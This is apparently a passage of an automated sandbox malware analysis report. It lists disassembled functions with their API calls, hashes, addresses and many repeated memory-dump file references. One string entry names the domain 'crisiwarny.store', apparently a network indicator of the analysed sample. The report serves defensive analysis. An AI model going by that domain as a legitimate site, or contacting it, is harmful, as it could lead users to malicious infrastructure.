                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID: BC02FCD6C80496ACB65E466FA2C3ADFE$Mz$crisiwarny.store$tO
                                                                                          • API String ID: 640775948-3138379286
                                                                                          • Opcode ID: e24e9f1c6bd80045ca57b1a55f61042581dceb95c073626266dfbac6c9f9e96d
                                                                                          • Instruction ID: bea4109cef97870e54ae4e08a49a41122299945675218c2ef0a54228c86c8d71
                                                                                          • Opcode Fuzzy Hash: e24e9f1c6bd80045ca57b1a55f61042581dceb95c073626266dfbac6c9f9e96d
                                                                                          • Instruction Fuzzy Hash: B0A101B01147818FE3258F25C890767BBE1FF52304F188A9DC4D64BB56D739E88ACB95
                                                                                          Function 004A0DAD Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 2a8acb88cbedb763182d871ea8ada9a6e96339040907456455c5be2a6189c310
                                                                                          • Instruction ID: b621c16cdbb8beab701fa4441e73503af20c379460ffd506f06c7daac9431711
                                                                                          • Opcode Fuzzy Hash: 2a8acb88cbedb763182d871ea8ada9a6e96339040907456455c5be2a6189c310
                                                                                          • Instruction Fuzzy Hash: B831E6711057818FD7258F29C850763BBE3BFAB304F2886AED0D69B752C739A846CB54
                                                                                          Function 00480B90 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 00480C8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 9ad12372ba7bf421b1ac3ba47cfa5b3afd48f52e7159ef6189454c52423cb534
                                                                                          • Instruction ID: 7fee5bb7e9f0b951e113e02a5583b45ee3adb9f42b3387dedd3aeaca2431d40b
                                                                                          • Opcode Fuzzy Hash: 9ad12372ba7bf421b1ac3ba47cfa5b3afd48f52e7159ef6189454c52423cb534
                                                                                          • Instruction Fuzzy Hash: 3331ECB1C10B40ABD730BA3D9A0B6177EB4A701660F40472DFCE69A6C4F230A4298BD7
                                                                                          Function 004B0E25 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 004B0ED8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 2e53c1907d85f765d63b753eab457c1ae837682a34852da0d22630189b8e21c7
                                                                                          • Instruction ID: b489f6579ef6908213d0403661e4491e33e9124e7ee7d73aef94669666452d2e
                                                                                          • Opcode Fuzzy Hash: 2e53c1907d85f765d63b753eab457c1ae837682a34852da0d22630189b8e21c7
                                                                                          • Instruction Fuzzy Hash: 6A11BD33F501228BDB188F79EC616EE7750FB45324B0907BAE827E7240DA7CDA004794
                                                                                          Function 004AE1B0 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004AE204
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: c838de0129c88a0a7c189c159f54bb14a7191256dae1611617c02c02eef0539c
                                                                                          • Instruction ID: f9edcf7aaa7a1a7ffa81ad3bf393746f8d007d78a2ec6db438de783c6cdd5883
                                                                                          • Opcode Fuzzy Hash: c838de0129c88a0a7c189c159f54bb14a7191256dae1611617c02c02eef0539c
                                                                                          • Instruction Fuzzy Hash: 43F0E97429D3505BD3088B10DCA171A7FA69BE1304F08487EE4D107391C27E581DD777
                                                                                          Function 004A4AC6 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 80dc36b2ef8b0def03416d257071dbedf3ba23eb26a44c3c89bedb5550bcdd9a
                                                                                          • Instruction ID: a0b180bf022e6894a73c6746e368428d1812ca8e619410bd97401f134a2f710b
                                                                                          • Opcode Fuzzy Hash: 80dc36b2ef8b0def03416d257071dbedf3ba23eb26a44c3c89bedb5550bcdd9a
                                                                                          • Instruction Fuzzy Hash: C1F028B4108701CFE315EF69D1A875ABBF0FB85304F10495CE4958B3A0C7B6A959CF82
                                                                                          Function 004A5D77 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
